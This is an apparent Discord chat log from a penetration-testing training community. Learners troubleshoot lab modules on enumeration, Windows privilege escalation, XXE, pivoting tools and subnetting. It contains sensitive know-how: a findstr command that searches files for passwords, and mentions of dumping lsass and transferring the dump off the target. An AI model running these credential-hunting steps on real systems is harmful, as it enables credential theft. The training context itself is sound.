I already have the answer but I'm sure I went about it the wrong way and I'm looking for a more efficient way to go about it. basically, how did you find which wordlist to use with dnsenum? I used the right one by sheer dumb luck, but if not I would have had to trial and error across every subdomain. is there something specific you look for or know?

Module: NETWORK ENUMERATION WITH NMAP - Saving the Results

HI Guys

While running the XML to HTML conversation on my VM box that is connected to the VPN I am getting the following error. I google searched but it was giving 100s of solutions that were not in connection to this.

Any Ideas

xsltproc target.xml -o target.html
warning: failed to load external entity “target.xml”
cannot parse target.xml

Many Thanks

Kapz

I think mine was trial & error also. Don't remember if resources had a list, but I sometimes forget resources is there lol. I found one in SecLists DNS file path

for this who can help me

Go to the Microsoft Community and you will find help there

what module is this?

based on the question you can probably just copy and paste the commands from the section and obtain your results.

this question:Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.

yeah but is not found the bob_adm's password

i know the question, i’m asking what module it’s from

WINDOWS PRIVILEGE ESCALATION-Other file

https://academy.hackthebox.com/module/67/section/639

i seem to have forgotten the same thing. it's bugged out for me now. neither cheat sheet or resources are loading but ill check it again later ;_;

who can help me

sorry forgot to reach back out, i’ll be back in a few hours if no one is able to help you, but usually you can just do exactly what the section did and get the same results

can I dm you?

sure, i’m not at my computer though so i don’t have my notes to assist😅

I call you

are you ok?

i don’t do calls😛

ok

can I dm you?

like i said i’ll be back in a few hours if no one can help you by the time i return

but if the question says “use the techniques shown” you can probably just use the commands in the section and retrieve the flag

yeah but I am from china,the time is have a problem

when running nmap did you use the -oX tag to output as xml before convert it to html?

hey i'm new at cyber security , i want to ask if anyone using ubuntu linux ?

the tutorials are using parrot, but i just started yesterday 😂

this channels is for HTB academy modules read #welcome and #rules after that use /verify at #bot-commands and ask that at #general at #1024429874246590575

but in short you can use whatever the hell you want

I am able to ping an IP provided in the interactive exercises but I am not able to open the web page it is holding at Port 80.

I am connected to an academy VPN. I have already re-generated it once by switching to a different eu based server, for more context.

who can help me

And when I am trying to reset the target, It is not resetting it as per say.

Rule 1:
Do not ask for help when asking for help. Please, simply describe the problem which you are facing.

Someone will come along and help you.

this

@brittle gorge

Can you describe which module or box are you talking about?
And what part of the problem are you facing difficulty in solving.

WINDOWS PRIVILEGE ESCALATION-Other Files

so can you help me

or can I dm you

If you can tell me have you tried everything taught to you in that section since the question really takes its basis on what techniques they've taught in the entire section above the question?

Since, it is mostly trying out different ways to sweep or search through the system to find different useful files. All those commands that are in the module.

yeah I use "findstr /si password *.xml *.ini *.txt *.config" this command but it have so many I can't found the right password

Okay, so can you peek your way through techniques related to powershell which is taught in the module and perhaps try those commands from the examples?

And if you get overwhelming amount of results from the commands then try using google to find out how you can filter those results or be patient and look through them. Try to utilise all the information which is at your disposal related to the user.

can I dm you

Sure

look like an gui issue did you refresh or even try an hard refresh?

yup. Did hard refresh and even changed browser with clean cache

There are no available instances. Please try again later.

not even getting instances lol

oh if that's the issue there is nothing you can do lol

pwnbox is not working

read general

same

im telling to you

xd

but if after this you keep getting that same issue with your target contact support

also your target wasn't docker right?

nope

okay, makes sense

do not contact anyone

they know there is a problem

just wait

where are you getting the problem? because i can spawn targets

and interact with them from my Parrot

Web Attacks -> XML External Entity (XXE) Injection -> Local File Disclosure

let me try

I am able to ping those targets but I am not able to interact with webpage served at port 80 of the target ip as intended.

works for me

When I try to curl, it shows

curl: (56) Recv failure: Connection reset by peer

And in browser, it shows Unable to Connect

wow

wait hang on i'm doing this exact module rn and my machine isnt working

ok i lied its fine again

skill issue 😛

Interesting

ok yeah no i think mine is back but i was def getting 'no route to host' or whatever in burpsuite

so maybe its just being a bit of a menace rn??

Okay, so I am now able to spawn a pwnbox

Okay, reset the target and now it is working in the pwnbox

lets go !

Although I feel, my VPN is still facing some issue. But I will finish this module in pwnbox. Thank you all.

my notes say I used ||sortedcombined-knock-dnsrecon-fierce-reconng.txt|| but there are probably other files to try also.

Hello Someone did the NTLM RELAY ATTACKS Course? I wanna ask if they give Vulnerable machines in the course to test the attacks

im using updog to transfer file to my attack host but i cannot

in short yes, but if you are new to HTB academy all section in every module that showcase techniques, methodology or exploit that is intended to be replicate there will be a target machine lab for it, and for sections that just have "additional information only" most likely will not have a target machine or labs

i dumped the lsass with admin privlige

when trying to uplaod it to updog

i got that error

never mind

i fixed it out

feeling stupid sometimes XDD

awh who deleted the macOS question 😦 best operating system

dm me 🙂

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2898:4d63:7808:6639%4
IPv4 Address. . . . . . . . . . . : 172.16.5.35
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.16.5.1

Ethernet adapter Ethernet1 2:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3dac:3388:e75f:b925%5
IPv4 Address. . . . . . . . . . . : 172.16.6.35
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :

yo guys this is the same network no?

172.16.5.x
172.16.6.x

but ehrn we look to the subnet its /16

no

review your networking basics

may be you can talk gently

you are asking for a direct solution

i asked that i know the subnet mask is /16 why them the network is /24

if you can guide some one thank you

if not

no need to talk

please formulate the question in a way we understand

what does this even mean?

/16 is not a subnet mask, it is a CIDR

a subnet mask is a 32 bits number

in the form X.X.X.X where X is 8 bits usually in decimal form

To figure out if two IPs exists on the same network, we can simply see if Network Address for each of our IPs that we can derive from IPv4 address and Subnet Mask are the same.

Network Address can be figured out by doing what is called Basic Anding of IPv4 address and Subnet Mask
If you are still having trouble then feel free to DM.

Isnt cidr the same as a subnet masks but shortened? Windows and cisco routers still use the old format but linux uses cidr to note masks

Ye

True.

255.255.0.0 == 11111111.11111111.00000000.00000000 in Binary == /16 in CIDR

Yep!

cidr is a model

strictly talking

a way of interpreting ip addresses

what happens is subnet mask agree with CIDR number

it is a convention

easier is to just see that /16 let only change 3rd and 4th octet and from there use modulo such as 16%8=0 which lets you with 0 bits reserved for the network mask, then 172.16.0.0 has to be the first ip in the network and 172.16.255.255 the last one

that is how i do it

with the modulo operation what you do is 2^(8-mod(CIDR,8))=2^8=256 but since ips start at 0 it turns to be 255, joining this with that /16 (or lower until /8) only change the last 2 octets you get the result

what are you trying to do bro?

hi guys, im trying to crack the Backup.vhd for the password hard module, im using the mutatedpassword list. am i in the right path for using this wordlist?

you do not need the "anding" operation !

it is way easier

and that is?

it is something called mental subnetting

i explained above

okay. He will try whatever suits him the best

you are not doing and operations in real life lets be honest...

https://academy.hackthebox.com/module/34/section/306 this is a great source of information

lol

yea it works, ligolo-ng right?

yes

when you learn it, it is super cool

good luck man

its is and way easier

waaaaaaaaaaaay

with listen-add

hahahaha

we told u

its just i can ping but the jhost discovery telling 0 host is up

although for the pivot module you should learn the other tools in case you ever need them

he is having a lot of technical problems

with those other tools

rpivot is the only one i remember hating

iirc he was on socksoverrdp but idk now

i'd just stick to chisel+socat and ligolo-ng xD

dnscat was like suuuuuper slow, you say "dir" and it takes 2 days

oo i did hate that one too

isnt this academy teaching us to think out of the box

nothing beats ligolo-ng, I did the skills assessment with it and it was magical

if a tool is not working for me and i reach the same solution with other tool...

let's be fair there

but learning other tools

is better

ofc

define better

sure, knowing all the tools is advised, you never know what you're gonna run into

obviously everyone is starting to learn and use ligolo-ng, but the point i was trying to make is if it ever doesn't work you can fall back on those other tools

ah yes

totaly agree

yo guys what worng with my nmpa scan

┌──(shadowalker㉿kali)-[~]
└─$ nmap -sn 172.16.6.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 12:25 CDT
Nmap done: 256 IP addresses (0 hosts up) scanned in 105.20 seconds

for host discovery i just run custom for loop

with dev tcp under common ports

oh oki

a ping sweep

yea

but not with ping

with tcp

-Pn -sT is what I used with nmap

coz maybe machine has pings disabled

hes tryna discover hosts xD

yup

-sn -Pn -sT

what does it do?

Or firewall that can block ICMP traffic 👀